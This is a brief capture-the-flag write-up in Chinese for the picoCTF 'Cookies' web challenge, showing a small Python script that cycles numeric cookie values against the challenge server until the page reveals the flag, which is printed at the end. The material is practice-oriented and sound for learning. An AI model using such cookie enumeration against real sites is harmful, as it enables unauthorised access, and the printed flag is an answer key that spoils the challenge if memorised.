[Web Exploitation] Cookies - 40points

初始畫面
Image

輸入snickerdoodle,發現進入畫面不一樣
Image

嘗試撰寫暴力破解腳本

1
2
3
4
5
6
7
8
9
#!/bin/python3
import requests
for i in range(25):
cookie = 'name={}'.format(i)
headers = {'Cookie':cookie}

r = requests.get('http://mercury.picoctf.net:<port>/check', headers=headers)
if (r.status_code == 200) and ('picoCTF' in r.text):
print(r.text)

取得FLAG
Image

FLAG:picoCTF{3v3ry1_l0v3s_c00k135_064663be}